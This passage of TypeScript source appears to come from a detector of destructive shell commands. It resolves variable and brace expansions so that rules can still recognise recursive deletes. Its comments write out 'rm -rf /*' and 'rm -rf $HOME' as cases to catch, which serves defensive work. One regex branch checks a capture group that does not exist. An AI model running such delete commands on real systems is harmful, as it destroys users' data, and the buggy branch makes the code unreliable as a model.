      const name = substringRef[1];
      const value = knownVars[name];
      if (value !== undefined) {
        const offset = substringRef[2] === undefined ? 0 : Number(substringRef[2]);
        if (offset >= 0 && offset < value.length) {
          const end = substringRef[3] === undefined
            ? value.length
            : offset + Number(substringRef[3]);
          return value.slice(offset, end);
        }
        return '';
      }
      if (!unresolved.includes(name)) unresolved.push(name);
      traits.push(`unresolved-variable:${name}`);
      traits.push('opaque-parameter');
      // `${HOME:0:1}` resolves to `/` from a known $HOME and to `/UNKNOWN` from
      // an unknown one. Both are root-like, which is what the rules need to see.
      return this.placeholderFor(name);
    }

    // `${VAR:-default}` and `${VAR:=default}`. An unset variable takes the
    // default, so a literal default is a real resolved target and needs no mark.
    const defaultRef = /^([A-Za-z_][A-Za-z0-9_]*)(:?[-=])(.*)$/.exec(braced);
    if (defaultRef && defaultRef[1] && defaultRef[4] !== undefined) {
      const name = defaultRef[1];
      const fallback = defaultRef[4].replace(/^["']|["']$/g, '');
      const value = knownVars[name];
      if (value !== undefined && value !== '') return value;
      if (fallback) return fallback;
      if (!unresolved.includes(name)) unresolved.push(name);
      traits.push(`unresolved-variable:${name}`);
      return this.placeholderFor(name);
    }

    // `${VAR:?message}` aborts the command when unset, so nothing is deleted and
    // there is no target to report. `${VAR:+alt}` and `${VAR?alt}` only select
    // between two known values.
    const conditionalRef = /^([A-Za-z_][A-Za-z0-9_]*)(:\?|:\+|\?|)(.*)$/.exec(braced);
    if (conditionalRef && conditionalRef[1] && conditionalRef[3] !== undefined) {
      const name = conditionalRef[1];
      const operator = conditionalRef[2];
      const alternative = conditionalRef[3].replace(/^["']|["']$/g, '');
      const isSet = knownVars[name] !== undefined && knownVars[name] !== '';
      // `${VAR:?err}` aborts the command when unset, so nothing is deleted and
      // there is no target to report. The original text is kept because the
      // command never reaches the filesystem in that case, and substituting a
      // plausible path here would describe an execution that cannot happen.
      if (operator === ':?' || operator === '?') {
        return isSet ? knownVars[name] : original;
      }
      if (operator === ':+') return isSet ? alternative : '';
      if (isSet) return knownVars[name];
      return alternative ? alternative : this.resolveVariable(name, knownVars, traits, unresolved);
    }

    const plain = /^([A-Za-z_][A-Za-z0-9_]*)$/.exec(braced);
    if (plain && plain[1]) return this.resolveVariable(plain[1], knownVars, traits, unresolved);

    // Not a parameter expansion this resolver understands. Leaving it verbatim
    // is the honest outcome: a substituted guess would be worse than text a
    // reviewer can still read.
    return original;
  }

  /** Expands `{a,b}` into its cartesian product, honouring prefix and suffix. */
  private static expandBraces(input: string): string {
    let output = input;
    for (let pass = 0; pass < 5; pass++) {
      const match = output.match(/\{([^{}]*,[^{}]*)\}/);
      if (!match || match.index === undefined) break;
      const before = output.slice(0, match.index);
      const after = output.slice(match.index + match[0].length);
      const expanded = match[1]
        .split(',')
        .map((choice) => `${before}${choice.trim()}${after}`)
        .join('  ');
      output = `${before} ${expanded} ${after}`;
    }
    return output;
  }

  /**
   * Splits a resolved stage into tokens, honouring glob characters as part of
   * the token rather than as separators. Globs are left intact because `rm -rf /*`
   * must survive tokenisation intact.
   */
  private static tokenize(input: string): string[] {
    if (!input.trim()) return [];
    return input
      .trim()
      .split(/\s+/)
      .map((t) => t.trim())
      .filter((t) => t.length > 0);
  }

  /**
   * Rebuilds a single canonical command string from the resolved segments, which
   * is what the rule patterns are matched against.
   */
  private static rebuild(segments: CommandSegment[]): string {
    return segments
      .map((s) => [s.executable, ...s.args].join(' '))
      .join(' | ');
  }
}

/**
 * Variable names whose value is conventionally a root or home path. Treating them
 * as `/UNKNOWN` rather than as an opaque token means `rm -rf $HOME` still
 * resolves to a recursive delete at root.
 */
const DESTRUCTIVE_VARIABLE_NAMES = new Set([
  'HOME', 'ROOT', 'PWD', 'OLDPWD', 'DESTDIR', 'PREFIX', 'SYSTEMROOT', 'USERPROFILE'
]);
